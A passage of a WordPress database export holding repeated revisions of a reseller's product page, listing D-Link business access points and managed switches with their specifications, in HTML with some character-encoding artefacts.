255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:56:50','2019-09-25 04:56:50','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3384,1,'2019-09-25 12:57:46','2019-09-25 04:57:46','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:57:46','2019-09-25 04:57:46','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3385,1,'2019-09-25 12:58:25','2019-09-25 04:58:25','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br 